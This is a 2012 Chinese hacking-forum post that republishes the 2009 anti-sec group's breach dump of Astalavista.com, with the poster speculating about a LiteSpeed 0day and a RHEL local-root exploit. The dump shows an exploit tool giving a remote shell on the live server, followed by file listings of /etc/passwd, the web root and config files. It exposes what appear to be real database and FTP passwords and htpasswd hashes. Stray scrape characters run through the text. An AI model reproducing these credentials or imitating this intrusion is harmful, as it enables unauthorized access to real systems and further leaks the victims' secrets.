找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2498|回复: 0
打印 上一主题 下一主题

Astalavista被蹂躏过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:07:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。4 h& p* a, U; x4 W# p* S

* K: T* g5 `9 q: o6 z[root@front3 ~]# curl -I litespeedtech.com" V# [% f0 K1 E6 h  W
HTTP/1.1 200 OK
4 Q: X" C' |: j1 aDate: Fri, 05 Jun 2009 22:54:51 GMT# C0 B$ e/ ?( a
Server: LiteSpeed. g, s( Q5 B. G; g5 l
6 S( e' X: M0 ]. @( ^* M
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-/ o, G! |6 f- |5 j' o  P

  `) `4 w9 o) m% J2 ]- [( h有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。  b, \' A" Y3 c1 ^& c
) T8 V1 C& C/ P0 ^+ e4 W
9 R) y7 e3 \7 U7 X
/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \
3 ?& q1 m/ j, v/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \
$ x' ]: R- ~, C! v) d/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
1 z1 r2 X" F: d$ G/ i: S  z\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /. d0 W5 |7 I7 m) h0 e# {
        \/        \/                 \/        \/       \/                     \/                 \/( G+ d* V6 I9 o$ K
                                  The Hacking & Security Community
& N0 E, ^0 y+ @5 _4 ?" u: _' @2 r% [[+] Founded in 1997 by a hacker computer enthusiast( Q, N( o* ~0 G' k& u8 j0 R
[-] Exposed in 2009 by anti-sec group( b$ L0 Y: k: N9 k. [& F  O2 L- M
6 c! w/ `# c5 Z2 W* i
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:( I' a; {$ v4 Q; \" z6 y
>> 03. Who’s behind the site?
* X! P! L. [! B" r* `>>
! F+ e# e) h2 l8 o1 G>> A team of security and IT professionals, and a countless number of contributors from all over the world.
4 K' f, e7 n$ P& [3 s1 d. d5 m" h5 P% h) \% y/ H1 |- z; |$ V
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
. ^* _! n4 a3 T6 a: w0 M* p. L+ s>>
' a2 N# A$ L  T, Y9 N7 V>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
2 w  D0 p+ N# N) t# M8 ]military institutions.
8 G, J* ^% ^1 V- j9 X" T! \>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information." B' g+ c% R6 ^9 T! u

0 {2 `/ _' h  i! T: kWhy has Astalavista been targeted?
  v9 k! U" o  F1 _6 O/ g7 a! {: O9 h5 I. e) q4 l0 t
Other than the fact that they are not doing any of this for the “community” but
! H0 w- E7 F9 k( Lfor the money, they spread exploits for kids, claim to be a security community1 u7 ?- v# @: l( e  t3 b- l
(with no real sense of security on their own servers), and they charge you $6.663 n/ G8 q& B7 H
per months to access a dead forum with a directory filled with public releases
1 `' r3 W; L, b" f- f3 tand outdated / broken services.
! ?# w' w- X. P3 Z: I: O9 _1 ^1 Z+ C5 H" @. X
We wanted to see how good that “team of security and IT professionals” really is.; T+ ?3 ]7 g' g2 i: f2 e% l
+ ~0 r7 ~. V$ j$ e1 _9 K# R2 k, ~1 M
Let’s begin.
  w8 z- h  {% W5 ~: b( U- V' G8 F+ c( I$ o5 Q% z% b0 |' l
anti-sec:~# ./g0tshell astalavista.com -p 80/ r; D+ B+ k# V9 N4 Y' ]; R: \
[+] Connecting to astalavista.com:80
, s8 g+ k( W" c% |7 ^+ V1 z; Q[+] Grabbing banner…( |1 n$ R  i% O" F- d
LiteSpeed% G. I5 |, E5 R& B- O4 X# u  @, \1 D
[+] Injecting shellcode…
; A$ l# Z$ V8 d" s[-] Wait for it
. W4 K& B( `( M; y8 F; J6 E9 i# q
4 [) m6 x0 Q! F6 h7 _1 `[~] We g0tshell+ N; {" k* e) Y/ v1 s0 [8 f
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
' i7 t+ {: E8 u5 J! gID: uid=100(apache) gid=500(apache) groups=500(apache)
8 t* n$ }* `* C4 L' L* W
- y" V$ T  \& |) ssh-3.2$ cat /etc/passwd
+ @- s. S. L4 n. I/ M$ Groot:x:0:0:root:/root:/bin/bash
0 F, P; u$ K' H) Hbin:x:1:1:bin:/bin:/sbin/nologin" f3 o1 \$ e% ]/ J
daemon:x:2:2:daemon:/sbin:/sbin/nologin
$ b  Z% t" }: E* E1 Y5 ~adm:x:3:4:adm:/var/adm:/sbin/nologin
% U2 |/ T- M2 C' c8 Q" mlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin( U$ `, d% @0 B4 ~3 y
sync:x:5:0:sync:/sbin:/bin/sync9 Y1 T- m- w, U+ h3 Q! O6 W( F
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown% s$ b* d( p- u) g2 `8 {) m0 p9 k: T
halt:x:7:0:halt:/sbin:/sbin/halt
) H0 J+ o* ^6 v, u) ]) i. K( rmail:x:8:12:mail:/var/spool/mail:/sbin/nologin% H. Y; M# ^: k& {0 Y& a
news:x:9:13:news:/etc/news:: I0 ~  u% u( u4 q
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
" h4 A) Z0 i1 joperator:x:11:0perator:/root:/sbin/nologin5 o; E+ W" d& z+ w# A' d
games:x:12:100:games:/usr/games:/sbin/nologin
8 B" Q, q. _- N) t3 Q9 Lgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
$ y3 j& P6 b  fftp:x:14:50:FTP User:/var/ftp:/sbin/nologin3 A: i9 g9 q/ M: ^& D
nobody:x:99:99:Nobody:/:/sbin/nologin$ z- g; j- f9 ~8 X- j' a9 }, {
rpm:x:37:37::/var/lib/rpm:/sbin/nologin: L# r& F" H- _0 S1 G8 B) ^# y
dbus:x:81:81:System message bus:/:/sbin/nologin2 X9 \, Y: T# _! a6 m4 M
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
. Z' q8 |, Z4 mmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
. C- y6 V" i- d8 V( c) ]smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin1 K6 E" `& s2 |. |. @/ b
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
) E  ^- D* x! m: r" F. R9 u: g, e% ^haldaemon:x:68:68:HAL daemon:/:/sbin/nologin/ H) I# |9 S1 F2 Z; J: d' P. l
rpc:x:32:32ortmapper RPC user:/:/sbin/nologin
- h# g- k& X6 {& I  \) g* ~rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin8 P: @, Z( A& b# M
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
3 ]$ [5 `- c2 _sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin5 u- w, I; G6 _; e$ s* x' |/ X
pcap:x:77:77::/var/arpwatch:/sbin/nologin8 _0 J+ [  z0 l# i: v
named:x:25:25:Named:/var/named:/sbin/nologin; R. v4 E; r# o4 I% s7 z" }) [
apache:x:100:500::/var/www:/bin/false
$ O) r* l  _; q9 Mdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
+ @: M6 ^8 x$ J# H2 z& t1 bmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash+ R7 I: g9 s- i9 l* N2 n# o5 g( W* o
webapps:x:500:501::/var/www/html:/bin/bash
1 W! R$ ~) ?7 c& S+ P; Cmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash  e8 `0 m! U! @3 {
admin:x:501:502::/home/admin:/bin/bash
% U5 s' |" F* O, T' f; Bjon:x:502:503::/home/jon:/bin/bash
/ I: j1 I0 ?/ a+ @& Gcom:x:503:504::/home/com:/bin/bash
" I4 A$ @2 O, m: f5 ~ntp:x:38:38::/etc/ntp:/sbin/nologin1 Z7 Q. g6 n2 T. l0 R
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin4 ?; U0 ?1 ?. ^6 p
astanet:x:504:505::/home/astanet:/bin/bash
6 [! {- z" }- z, V9 Qavahi:x:70:70:Avahi daemon:/:/sbin/nologin
  H7 D  ~6 l9 [0 |" R7 Mavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin: k& c' F7 t9 q) K

! Q# K, A# i$ Y( }/ h5 a% ksh-3.2$ cat /etc/hosts" Q0 V1 q9 |% A& a
# Do not remove the following line, or various programs6 Z" A/ [+ M8 F; b" G( A
# that require network functionality will fail.6 W4 ?* f6 g" @1 s$ x: b) F
127.0.0.1       localhost.localdomain   localhost
5 u7 N2 A$ m3 n3 d. O::1     localhost6.localdomain6 localhost6) G' \9 a: O# }3 E$ M
80.74.154.172           asta1.astalavistaserver.com! K  E$ z) c) A$ ]8 J% U) b1 e
9 t1 T/ q  R! g: b. Q9 y7 y
sh-3.2$ pwd
. z, D5 Q. T1 T9 X- m9 D, \/home/com/public_html( F/ `5 c4 i) T+ D7 ~$ A

6 F7 e4 r9 L3 S0 h, R; H* Ssh-3.2$ ls -la
6 Q; o% }/ k! C9 ?$ ]/ L. o5 ~total 18460
0 E5 D9 ~7 S  W. w. L# Tdrwxr-xr-x 30 com apache     4096 May 28 17:06 .
3 X, I2 U. V1 Hdrwx–x–x 11 com com        4096 Jun 25  2008 ..+ D$ K7 R8 `0 p; i
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin$ _2 w3 y0 p9 b* k" X
drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache
2 v& e& b, L0 Y8 r0 O% N; Q( zdrwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin0 ?6 E9 a; @- O
drwxrwxrwx  2 com com        4096 May 19 00:50 config( w5 b  H6 X6 q" m
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core
' p% n' I4 \$ t' A2 `9 kdrwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules
; U  |( C' _1 C6 y! P% q" cdrwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing$ |' f" r, T. U& w
drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
  T$ ]. V( ^- Q' V! [drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__/ ~  {5 a2 ?0 z5 K. Z, `
-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php
( M5 {& k, Q1 O' `1 e( N7 Gdrwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
( G3 R8 t' P. Z7 |6 i: E1 n: Edrwxr-xr-x  3 com com        4096 Feb  2 19:29 editor' z+ N4 s2 g/ {8 {. y
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico
0 J4 N9 A$ b1 `* \' }' ^drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed' z" g1 p, |4 M. J2 R
-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
- ?, O* r9 y" I& v! S-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak" d4 |1 h8 Z8 g9 x; D1 c" D! F
-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak! \: M3 s/ w+ I' T1 a4 I* [1 \6 _
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
7 y/ w/ k2 l& ?8 D! ^  A/ |/ Z: Vdrwxrwxrwx 14 com com        4096 Feb  2 19:29 images
- j$ p# p# P7 x0 x" o-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php
- Y* @  ]$ Y' q0 tdrwxr-xr-x  6 com com        4096 Feb  2 19:29 installer
, o4 Z( x0 s9 `drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang7 Z/ y. `/ i! a$ Y$ ^1 @
drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
5 ^1 n) F; N$ D" Odrwxrwxrwx 12 com com        4096 Jun  2 07:47 media0 X" Y' V8 j  Y" L
drwxr-xr-x  8 com com        4096 May 11 12:48 modifications
& a4 O& V5 z9 {+ I' h; cdrwxr-xr-x 34 com com        4096 May 28 16:30 modules0 V  J/ H7 S6 H4 `5 ]! L. v
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin  X! f+ _/ Q+ q( P0 Z5 a! c
drwxrwxr-x 22 com com        4096 May 28 17:06 _new
) y3 F$ d1 p5 |1 x. xdrwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
5 l$ b4 B4 F; M0 |/ c+ Kdrwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy/ `8 L, G; t0 q2 k5 o/ e* H$ ]" u
drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
* H& c4 w+ ^* G-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt
# L; ?! S. i* M( z9 u, I-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml
5 ^/ I6 v( w( K2 c% L9 B1 N6 M5 g-rw-r–r–  1 com com         223 Mar 30 15:32 test.php3 I3 O$ [( j, J! S6 d
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
* S: G3 @& |1 [  K# Z- X0 i# t& Gdrwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp5 g; n7 l2 h% y/ S/ s6 ^' w
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam4 {* {+ W& N/ t$ Q; n  c

5 j8 ^* P$ b8 tsh-3.2$ head -20 index.php5 n0 H* W* J  e$ [
<?php
% O, N/ |$ O0 Y' h9 J7 N, y6 ~$ X3 _5 Q; I% P
/**$ @* Z9 C7 p+ |8 X: \( I  _
* The main page for the CMS: u- i; ?$ I6 s+ `# o: Q  h4 |
* @copyright   CONTREXX CMS - COMVATION AG
. g1 v; l! \3 x' u' }: n8 V* @author      Comvation Development Team
% h( m" Q/ R+ u* @version     v1.0.9.10.1 stable# M6 g& F& B7 p% {
* @package        contrexx- B$ W& l! \1 E5 O2 {
* @subpackage    core
. T# x4 v, m" H1 F* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
6 e+ l& m1 l: t2 [* @since       v0.0.0.00 e/ k% U& m' e
* @todo        Capitalize all class names in project
3 {2 S$ W0 j! O, A8 R5 X* @uses        /config/configuration.php. A' Y! b- }/ a+ ?* K) ?  J( X* }
* @uses        /config/settings.php# k6 @3 ~& l, D( q
* @uses        /config/version.php
- @+ g+ I' C/ M- ]+ j4 u5 ?* @uses        /core/API.php/ Q! A; M( q4 O, d5 V" B
* @uses        /core_modules/cache/index.class.php. G7 X+ |4 L2 W, K: M
* @uses        /core/error.class.php' C- ?) S# c* [! S9 X1 X
* @uses        /core_modules/banner/index.class.php
  G- g. J4 t7 e2 h5 `* @uses        /core_modules/contact/index.class.php
+ A) a% ~8 ]! Z5 @4 S% y; T# R( N$ s1 i' e$ ]1 J7 ], v3 \& F$ f
sh-3.2$ cd config/
7 Q4 A' T+ d5 x- |sh-3.2$ ls -la
( u" ^5 {5 v/ L" _1 v6 C1 ctotal 32
2 W+ U( E, S8 `$ s( b7 {/ ^drwxrwxrwx  2 com com    4096 May 19 00:50 .. E) b! ?6 C( i
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..9 m: p5 n" b) V- J
-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
# u# `# @! f: V! a0 T: r: Q-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php. r* A' @, b7 w/ Y3 t6 y
-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php* _- H5 {: ?2 j$ [! k4 n4 I! y. q
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
4 v9 {7 i- R( l! P, K% J4 k0 h# A0 I: q
sh-3.2$ cat configuration.php
, c: e5 s* b, s  z[snip]
& J5 n+ Q+ _) l; H7 y) L* f' A$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost- G% Q- R5 ]- ^2 `6 b" s$ d
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name' {4 D, h% r' G# r. H' d3 o
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix8 n/ f: J; g7 r; {& O% {* c$ W9 e
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username! L- H# w9 W+ ^/ P
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
6 t; k3 v! X1 U  g$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
$ V6 p$ ^4 v( j$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..), @) k0 D* @3 u
[snip]0 }( ^3 Q: ?. N  x
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
: |5 b4 ?, o0 Y! ~. w5 b: w- E$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode
& b$ S7 s9 P- c7 _$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost+ R* ^; \6 ]6 ~6 x/ i, ~5 V
$_FTPCONFIG['port'] = 21; // Ftp remote port$ g$ t  j2 o" L: J! t4 d
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username7 i# `! v$ F. r. r0 X5 Z6 Q, e
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
2 F; u4 Y: \. r, e$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms
6 ?, p8 ?+ j* g$ n$ \! L9 g1 r" Q7 N3 j2 `7 l- {
sh-3.2$ cd ..$ W% x# C- n7 B0 ]
sh-3.2$ cd dvd/
' S" P7 t8 m5 @1 v( h/ vsh-3.2$ ls -la
* H- G- B' z3 |9 I1 Ctotal 2913780
, ~% K, W, }6 Y% Udrwxr-xr-x  2 com com          4096 Sep  9  2008 .
0 }$ D; u6 Z2 ?; t; X" f. G6 U/ Z8 odrwxr-xr-x 30 com apache       4096 May 28 17:06 ..8 l: S4 f3 X2 B5 n
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar. n8 ]" x, ~( D! w. q* p
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar
  ^; o  g& y6 W' Q  [2 ?-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar
% C  U! N! y$ u8 S( `-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess, `$ W" U9 A0 R7 J, A' S
6 w0 _$ t" ^: |/ @  Z6 s
sh-3.2$ cat .htaccess
" }0 t% `* Z/ b* \authType Basic- y  x3 @1 h3 a3 V, G
authName DVD
+ L' k+ h0 i% sauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd4 k+ `& J; b+ n
require valid-user
, t1 T$ p  Y& T  M. }0 Z1 r& o# i5 T5 g* i
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
/ x; n# T: }% D! lDVDdownload:CRD8cuY6.MPT6
! S/ h. @) I. z, Z3 Y, tDVDdownload2:CR8a36.wluFMg
7 V$ p' R/ Z7 ?, A0 J9 S% S) K) \4 h; s$ L8 y/ P
sh-3.2$ cat test.php7 y% V3 c8 ^" }* y6 A% t
<?php
( F3 m6 v$ f2 U- Y! p0 ]+ i8 r2 d& N$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
3 J# U. n( k( ~$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));
) c& B5 t  e2 Q: O/ U3 {echo $url;" N; ~2 r- @7 p4 L$ d& A
?>
8 ~' w+ {+ S, J% G) R: U6 C4 G; d2 Z6 N/ [3 K, ^4 |$ N" s& S
sh-3.2$ cd modifications/
# L: p  T8 x% [) q5 {& {; wsh-3.2$ ls -la
7 _7 n3 [* y8 d7 J# j  `total 32. g4 D' B7 G! C; {/ [7 r3 u5 x
drwxr-xr-x  8 com com    4096 May 11 12:48 ., e( y9 Z. b8 S1 _# J
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
1 H( h9 J1 U( h0 F' l' r' j, |drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng% S8 S' X/ O/ A8 O  L
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs) ~3 o, \2 w' M& n9 X: {
drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
) k: W$ l# _: ]2 N+ d* Fdrwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
$ s2 M6 ?$ s5 t7 a" Z' vdrwxr-xr-x  2 com com    4096 Feb  2 19:33 search
0 Q9 x; ?/ h2 P/ H6 Wdrwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
1 c3 D8 T6 d3 q% O: A6 b% L6 Q4 d5 [, p1 g; A9 F& E' O) F) V7 ~. P
sh-3.2$ ls -R4 N5 @' n* J; n- R. u; K
.:* M3 `3 W8 G9 L* E
com_avtng  cronjobs  onlinetools  pjirc  search  _tmp% i! _" Y, W1 N' L4 J2 X" M, [
3 P# S% }4 s8 k, T
./com_avtng:
. t; a  o- ~% z! K  f4 p8 Navtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts3 q! M" M) i  b; F) M
# m3 b, N/ y+ T4 H& ?# h3 f
./com_avtng/scripts:
; p) K6 a$ W; L  |% E/ {4 r) ~) Gpopunder.js
" A2 z& ?' Y4 }: [' ^0 @- _! t6 y+ P9 B& `8 _' V$ Q" N
./cronjobs:7 {. s$ v8 W2 t
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp
7 \  c6 I9 O5 S) T+ J
( z. Q( k; t9 O& o# u! r0 l+ x./cronjobs/tmp:
. k8 H) t; U* i8 q5 P8 vcontrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
- i& B) v8 @! ^. Z- t5 t7 U* K/ K$ e8 g/ X7 Y2 s7 r
./onlinetools:2 W2 v/ v8 q) [" n* Y
index.php
( s( c( R' d2 i* B/ q, b7 N2 ]; W8 |$ I) c$ N
./pjirc:6 {1 L1 n$ ~$ v- D6 d
a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt3 x2 u7 s0 P# y/ G# A9 q
AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt: K, e- R0 @9 U- `
background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd( {" s* @4 u" y/ Q$ ]. m3 J

; d. S2 t6 v6 B$ L./pjirc/img:; y* T+ k( `7 M4 j
ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
4 f4 D+ v7 K, h6 a, g7 Oarbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif     G) W; |0 x& a5 p( {/ F- G
verre-eau.gif( }4 v  y) q4 I! y: I
argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  4 F; M  l8 i; H
verre-vin.gif6 T7 g  Z. c1 I2 i
ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif. s2 O$ B+ m' k
biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
; s7 S, g: U; [# w
: b& Q! g* |5 Y3 \: `./pjirc/snd:
1 L/ J3 j7 o* H- H" }bell2.au  ding.au
. C( @* s: Q' ~8 F9 _# }+ n, i, k1 n1 d# U# A5 P; s8 D* ]
./search:+ Y2 O! s* Y$ `  |
searchEngines.php  search.php
$ [+ H6 o4 ]" r0 A/ Y+ P4 ]/ ]* b% t& u% U. f# y. g. p, T0 G+ }
./_tmp:
: M1 }3 d/ ~5 j+ t8 l! ]defaultPorts.php  defaultPorts.txt8 R9 q- n1 s' V$ e- H, @5 P& @4 y: u, \
( `1 i- n' g' X" |! _+ t% n+ W
sh-3.2$ cd cronjobs/, C' o3 U4 R& L
sh-3.2$ cat exploits.php1 \, `; O$ `2 ~, P* T
[snip]) ?' p/ p0 @/ E: x3 `
$categories   = array();0 l, t9 P( t/ J# q" v; O: m9 H4 I
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;" W) G; w, m# V1 y) H
$expolits     = file($milw0rmFile);
( b4 O$ h8 ]& t# q+ w7 @$comExploits  = array();
+ X9 e) ]4 N$ L) C/ ?[snip]% T& f+ f$ |- l+ x& t# p
// manage data
) H/ U. K8 N! m/ r+ r: ~for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
6 Y7 `* d7 e6 t; b2 H; T% h: R% A& S5 M" |  p3 A7 V9 C
    // get path and title
* ~! D+ y# O0 K! {1 @# I1 M7 X    $expolits[$x] = trim($expolits[$x]);
' e& w) J; {0 U! Y9 ?    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));. A" S6 m+ Z4 X
    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
# F1 \1 ^$ j; ?
! l0 n, `# v) y    // check if file exists( e) x/ I2 Z6 O7 V6 E! d
    if (file_exists($path)) {0 p* Z. I) d  A3 |5 O; B
  P  r& g3 ~0 S$ h8 {6 O% A
        $text = file_get_contents($path);' v( J* s4 f, b5 i5 Y

7 J+ j- E0 o; }7 e        // get content and date
6 b8 a5 l" W8 }        //$text = htmlspecialchars($text, ENT_QUOTES);) s5 G& L; K- l; p: B
        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));1 f) [2 a( r; M0 w1 ~, Z0 [6 H
        if ($tmptext != ”) {% o7 y0 `6 s# W
            $text = $tmptext;3 ?, u( B" s' W& I1 Q
        } else {0 Y0 L. l$ B- q7 k
            $text = addslashes(htmlentities($text,  ENT_QUOTES));5 ^4 `3 i7 F! y% T1 N3 V6 `7 p! U
        }
" G5 g& _6 K/ R& C# b* e, E        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
) Q' W; Q* q2 u, M+ S! P- j        $tmp  = explode('-', $date);
7 b4 @# \6 @  r        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
& f9 b6 e) `6 a/ P, C1 c) A% O        $cat  = getCategory ($path);
4 i8 C: u4 e3 D2 ]6 {9 W4 P# m9 B        $ext  = pathinfo(basename($path));
1 L2 \4 z$ o3 q$ f/ E7 t        $ext  = $ext['extension'];3 X+ F( l2 h' u6 y1 g
        $qStr = ”- G" \2 r+ n: j4 _
            SELECT  `id`; ~) Y2 k- ]2 ^) c8 s( V! q7 @
            FROM    `contrexx_module_exploits`
  T6 P* h4 b1 |7 x( `            WHERE   `title`  =  ‘” . $title . “‘. w' x  z3 V- i6 V* z2 A; |
            AND     `date`   =  ‘” . $date . “‘5 C9 N' r9 }& B/ ~' ]
        “;. g6 H/ O% u  g# [9 }
        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
3 N& x9 x/ A0 @! x4 T        $q = $_objDB->query($qStr);8 V$ \2 e. d6 e
" R  |% f. p" B% D
        if ($q->numRows() == 0) {8 @7 _7 u$ d  [. k: A

* K" L: S) A& x6 I7 m            // prepare array
3 U+ O( a4 K! j& I! k            $comExploits[$x]['date']      = $date;) }" Y8 `3 c( U# s" R
            $comExploits[$x]['title']     = $title;. J- E% u( O2 P- {; ?+ N
            $comExploits[$x]['author']    = ‘milw0rm’;8 [/ G4 E% U' G1 @8 T+ }; C
            $comExploits[$x]['text']      = $text;$ l- [# M% D, G8 j
            $comExploits[$x]['source']    = $ext;
: q$ T- {0 |0 _$ A: F2 k5 }; a            $comExploits[$x]['url1']      = ”;. z. p5 M+ @) _& s: g/ d
            $comExploits[$x]['url2']      = ”;
! b1 n; h4 H' |! p            $comExploits[$x]['catid']     = $cat;/ ~( B' ]3 U/ j7 V1 y9 p
            $comExploits[$x]['lang']      = ‘2′;0 W6 U: H' q/ o- [" e1 i% j& _
